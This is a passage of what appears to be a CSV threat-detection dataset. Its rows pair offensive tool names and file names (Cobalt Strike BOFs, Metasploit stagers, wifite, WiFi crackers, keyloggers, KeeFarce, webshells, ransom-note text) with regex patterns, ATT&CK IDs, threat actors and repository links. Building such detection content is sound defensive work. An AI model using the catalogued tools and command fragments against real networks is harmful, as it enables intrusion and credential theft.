T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","62575" "*WhoamiGetTokenInfo*",".{0,1000}WhoamiGetTokenInfo.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","62576" "*WHOLE NETWORK HAS BEEN PENETRATED BY Black Hunt*",".{0,1000}WHOLE\sNETWORK\sHAS\sBEEN\sPENETRATED\sBY\sBlack\sHunt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62577" "*WHOLE NETWORKHAS BEEN PENETRATED BYBlack Hunt*",".{0,1000}WHOLE\sNETWORK\<\/span\>HAS\sBEEN\sPENETRATED\sBY\Black\sHunt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62578" "*why,are,you,reading,this,thing,huh=*",".{0,1000}why,are,you,reading,this,thing,huh\=.{0,1000}","offensive_tool_keyword","pyobfuscate","ADVANCED PYTHON OBFUSCATOR","T1027 - T1027.009","TA0005","N/A","N/A","Defense Evasion","https://pyobfuscate.com/pyd","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","62579" "*wietze/Invoke-ArgFuscator*",".{0,1000}wietze\/Invoke\-ArgFuscator.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","62580" "*wifi/airpwn*",".{0,1000}wifi\/airpwn.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62581" "*wifi/dnspwn*",".{0,1000}wifi\/dnspwn.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62582" "*wifi_dos_own.py*",".{0,1000}wifi_dos_own\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scripts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","N/A","8","10","2098","1599","2024-10-22T13:31:06Z","2021-01-07T16:11:52Z","62583" "*wifi_dos3.py*",".{0,1000}wifi_dos3\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scripts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","N/A","8","10","2098","1599","2024-10-22T13:31:06Z","2021-01-07T16:11:52Z","62584" "*wifi_dump_linux*",".{0,1000}wifi_dump_linux.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","#linux","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","62585" "*wifi_fake_auth.*",".{0,1000}wifi_fake_auth\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - 
T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","62586" "*WiFi_Hacker.ino*",".{0,1000}WiFi_Hacker\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interface device (HID attacks). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","62587" "*wifi_pineapple_csrf*",".{0,1000}wifi_pineapple_csrf.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","62588" "*wifi_recon_handshakes*",".{0,1000}wifi_recon_handshakes.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","62589" "*wifibroot.py*",".{0,1000}wifibroot\.py.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. 
supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","network exploitation tool","N/A","10","1008","182","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z","62590" "*wifi-bruteforcer*",".{0,1000}wifi\-bruteforcer.{0,1000}","offensive_tool_keyword","wifi-bruteforcer-fsecurify","Android application to brute force WiFi passwords without requiring a rooted device.","T1110 - T1555 - T1051 - T1081","TA0002 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/faizann24/wifi-bruteforcer-fsecurify","1","1","N/A","network exploitation tool","N/A","10","1324","319","2022-04-16T02:59:36Z","2017-01-02T17:54:33Z","62591" "*wifi-bruteforcer*",".{0,1000}wifi\-bruteforcer.{0,1000}","offensive_tool_keyword","wifi-bruteforcer-fsecurity","Wifi bruteforcer","T1110 - T1114 - T1601 - T1602 - T1603","TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/faizann24/wifi-bruteforcer-fsecurify","1","1","N/A","network exploitation tool","N/A","10","1324","319","2022-04-16T02:59:36Z","2017-01-02T17:54:33Z","62592" "*wifidump.cna*",".{0,1000}wifidump\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 
- T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","N/A","10","10","635","57","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z","62593" "*wifijammer*",".{0,1000}wifijammer.{0,1000}","offensive_tool_keyword","wifijammer","wifijammer","T1497 - T1498 - T1531","TA0001 - TA0040","N/A","N/A","Exploitation tool","https://github.com/DanMcInerney/wifijammer","1","1","N/A","network exploitation tool","N/A","10","4082","790","2024-07-20T02:47:48Z","2014-01-26T07:54:39Z","62594" "*WifiPasswords.ps1*",".{0,1000}WifiPasswords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","62595" 
"*wifiphisher*",".{0,1000}wifiphisher.{0,1000}","offensive_tool_keyword","wifiphisher","The Rogue Access Point Framework.","T1553.003 - T1562 - T1539","TA0002 - TA0007 - ","N/A","N/A","Framework","https://github.com/wifiphisher/wifiphisher","1","1","N/A","N/A","N/A","10","13758","2642","2025-02-04T21:04:05Z","2014-09-26T12:47:28Z","62596" "*WiFi-Pumpkin*",".{0,1000}WiFi\-Pumpkin.{0,1000}","offensive_tool_keyword","WiFi-Pumpkin","Framework for Rogue Wi-Fi Access Point Attack.","T1562 - T1530 - T1552 - T1553 - T1561","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/P0cL4bs/WiFi-Pumpkin","1","1","N/A","N/A","N/A","10","3121","722","2020-04-18T19:32:52Z","2015-06-27T00:56:21Z","62597" "*wifite --crack*",".{0,1000}wifite\s\-\-crack.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/derv82/wifite2","1","0","N/A","network exploitation tool","N/A","10","6838","1403","2024-08-20T12:34:38Z","2015-05-30T06:09:52Z","62598" "*wifite --dict *.txt*",".{0,1000}wifite\s\-\-dict\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62599" "*wifite -e *",".{0,1000}wifite\s\-e\s.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. 
and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/derv82/wifite2","1","0","N/A","network exploitation tool","N/A","10","6838","1403","2024-08-20T12:34:38Z","2015-05-30T06:09:52Z","62600" "*wifite --kill*",".{0,1000}wifite\s\-\-kill.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62601" "*wifite --wep *",".{0,1000}wifite\s\-\-wep\s.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/derv82/wifite2","1","0","N/A","network exploitation tool","N/A","10","6838","1403","2024-08-20T12:34:38Z","2015-05-30T06:09:52Z","62602" "*Wifite.py*",".{0,1000}Wifite\.py.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/derv82/wifite2","1","1","N/A","network exploitation tool","N/A","10","6838","1403","2024-08-20T12:34:38Z","2015-05-30T06:09:52Z","62603" "*wifite2.git*",".{0,1000}wifite2\.git.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. 
a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/derv82/wifite2","1","1","N/A","network exploitation tool","N/A","10","6838","1403","2024-08-20T12:34:38Z","2015-05-30T06:09:52Z","62604" "*Will add the user to the administrator group (0x220)*",".{0,1000}Will\sadd\sthe\suser\sto\sthe\sadministrator\sgroup\s\(0x220\).{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","62606" "*willfindlay/bpf-keylogger*",".{0,1000}willfindlay\/bpf\-keylogger.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/willfindlay/bpf-keylogger","1","1","N/A","N/A","10","1","2","2","2020-01-13T20:17:02Z","2019-12-25T16:27:28Z","62607" "*Win phpMyAdmin Hacked*",".{0,1000}Win\sphpMyAdmin\sHacked.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","62608" "*Win.Countermeasure.KeeFarce*",".{0,1000}Win\.Countermeasure\.KeeFarce.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","#Avsignature","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","62609" 
"*Win.Tool.ADPassHunt-*",".{0,1000}Win\.Tool\.ADPassHunt\-.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for FireEye's Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","#Avsignature","N/A","10","10","N/A","N/A","N/A","N/A","62614" "*win_chrome_password_extractor.py*",".{0,1000}win_chrome_password_extractor\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","62619" "*win_fake_malware.*",".{0,1000}win_fake_malware\..{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","62620" "*win_keylogger.py*",".{0,1000}win_keylogger\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","62621" "*win_rev_http.exe*",".{0,1000}win_rev_http\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","62622" "*win_rev_https.exe*",".{0,1000}win_rev_https\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","62623" "*win_rev_tcp.exe*",".{0,1000}win_rev_tcp\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - 
TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","62624" "*win_wlan_passwd_and_wanip_extractor.py*",".{0,1000}win_wlan_passwd_and_wanip_extractor\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","62625" "*Win32:KFarce-C*",".{0,1000}Win32\:KFarce\-C.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","#Avsignature","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","62648" "*'Win32_Backdoor'*",".{0,1000}\'Win32_Backdoor\'.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","62650" "*win32_stage_boot_reverse_shell_revert.asm*",".{0,1000}win32_stage_boot_reverse_shell_revert\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62652" "*win32_stage_uploadexec.asm*",".{0,1000}win32_stage_uploadexec\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62653" "*win32_stage_winexec.asm*",".{0,1000}win32_stage_winexec\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62654" "*Win32kLeaker.*",".{0,1000}Win32kLeaker\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62655" "*Win7Elevate.*",".{0,1000}Win7Elevate\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
